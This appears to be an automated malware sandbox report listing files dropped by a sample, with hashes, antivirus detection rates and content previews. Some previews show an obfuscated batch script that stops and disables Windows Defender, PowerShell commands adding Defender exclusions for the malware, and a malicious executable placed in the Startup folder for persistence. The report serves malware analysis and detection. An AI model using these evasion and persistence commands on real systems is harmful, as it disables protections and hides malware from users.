                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guupapww.iif.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i34xi30m.50h.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4ep12v3.0x4.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itmz2rec.cma.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmd5esqe.nye.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n53wgmkc.hjj.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkandfd3.edm.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owyqwer5.pit.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prdboqvj.obf.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3cudrtk.i1j.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t55ukbii.j4o.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcgbxqwq.o1n.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlmwsvb4.xai.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w03g12pt.ext.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyv2ksux.dc3.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4bdcww5.qt0.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe
                                                                                                  Process:C:\Program Files\Common Files\system\E59A6148\svchost.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):91000
                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Reputation:unknown
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\test.bat
                                                                                                  Process:C:\Program Files\Common Files\system\E59A6148\svchost.exe
                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8399
                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe
                                                                                                  Process:C:\Users\user\Desktop\lKJbVguaav.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):856022
                                                                                                  Entropy (8bit):5.80731766715221
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:rn8yLq+IYhqreG7zHRwpS/hCcpzfRJYL4wFcTEDCN:rn3L1IYh+Zdl/dpz4swFPDCN
                                                                                                  MD5:5F377DE371A8E95ACEC9956303D6F032
                                                                                                  SHA1:4D36D918DF8FF90C0327EF713CFA262591D93636
                                                                                                  SHA-256:46EEDA891D1AB66CB14C007A901CF167B9E80ED78D9AF21889EEA4BE3EB55E09
                                                                                                  SHA-512:F7766DBB768CD671AC7A2E99B78625352B2BA53504CE9BAAF6545AFB0D33D769218B117400BB1658A48B1B6A108F56CF29B2287C761C9C98F7D6F714D6C4B506
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                  Reputation:unknown
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....q...............0.................. ... ....@.. .......................`............`.....................................J.... ..D....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...D.... ......................@..@.reloc.......@......................@..@........................H........T..$...............&...<........................................*:.(......}....*:.{......o....*R.......}......}....*6.{..........*:.{...........*..{....*"..}....*:..(..........*~..(....2....X( ....{..........**.{.......*R.{.....{.....Y.....**.{.......*b..1..{.......s)...(...+*..{....,..{......{.....s)...(...+*..{....*2.q....s....*&...(/...*..{6...*"..}6...*..(7...*..*..{4.....{3....._c...{2..._.....*..{4.....{3....._c...{2..._......*Z.{4.....{3....._c....*v...{2..._T
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe:Zone.Identifier
                                                                                                  Process:C:\Users\user\Desktop\lKJbVguaav.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26
                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                  Malicious:true
                                                                                                  Reputation:unknown
                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.DYnW38wW.20210915161257.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1787
                                                                                                  Entropy (8bit):5.314633242997005
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:BZ3v/doO+SXZqDYB1Zta9ZP6v/doO+SXZqDYB1ZA:BZf/dNTqDo1ZE9ZPm/dNTqDo1ZA
                                                                                                  MD5:CBB354B77261902C28AFF21CD02EE508
                                                                                                  SHA1:63276A0900457D23FC7EC7EFE3C0A4A99F76F8DE
                                                                                                  SHA-256:A0C435B6CB11E8965370860495424B61C8BCF24288AA1BB16A63DAD682EDE911
                                                                                                  SHA-512:EFE01730FE0CC7C8104EB73EF62888EF8FBFDBC90A9F5516D95A4D2CE508180137512C8DE9D56EE69D50BE7B41B58339759AA6594B537466A4C5251C4BEF0C03
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161300..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\E59A6148\svchost.exe -Force..Process ID: 6164..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161300..**********************..PS>Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\E59A6148\svchost.exe -Force..**********************..Command start time: 20210915161523..**********************..PS>TerminatingError(Add-MpPref
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.FKgT1nS8.20210915161142.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5795
                                                                                                  Entropy (8bit):5.399073582237563
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZf/dN0+XqDo1ZE+KZZ/dN0+XqDo1ZR4+P++PQ+PjZJ/dN0+XqDo1ZG5+PA+PA++:j
                                                                                                  MD5:1BCECF7B5C2CF02EBEC8FA5B06C8C2D7
                                                                                                  SHA1:E50FB576B8E57F985762E5294D12F3367B261177
                                                                                                  SHA-256:438A4C0AA0A42E53C88100D732DE52289DD315AF04C812484EFD6E92A587FBB4
                                                                                                  SHA-512:3B557279A3B310D9D0FD3CEBB8BAB06095BAD3D3E67E46EB6AC6480D727132DD4F256EDC29646627C4B6FAD85DCD070D983B558D088A7A28989DBB84EB6CEA63
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161146..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lKJbVguaav.exe -Force..Process ID: 2952..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161146..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lKJbVguaav.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915161449..Username: computer\user..RunAs User: computer\a
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.Ip8DGDRD.20210915161155.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5795
                                                                                                  Entropy (8bit):5.399594817977416
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZI/dN0+bqDo1Zz+KZd/dN0+bqDo1ZA4+P++PQ+PjZN/dN0+bqDo1ZRV5+PA+PAN:zCvq
                                                                                                  MD5:DACC57DEBB23BE527741557249A7E916
                                                                                                  SHA1:7BAF38A8C3DE8FDCF672D9EC1AC9659CD6D8B685
                                                                                                  SHA-256:D62606CA932B59E6EF750A2DBC7D16E7E7486296930D97F88F44D1E48CB803D0
                                                                                                  SHA-512:F9DE50C7D86DDC071321D7CD5D3BE01DA0A38B54FC6E6FD37FA12DFBA25B26B875A666490E54F221E0FAD754409AB2C773E82F9E4FFAF42A012B11020E6DBB7B
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161158..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lKJbVguaav.exe -Force..Process ID: 6668..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161158..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lKJbVguaav.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915161342..Username: computer\user..RunAs User: computer\a
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.UDSSE0Wa.20210915161256.txt
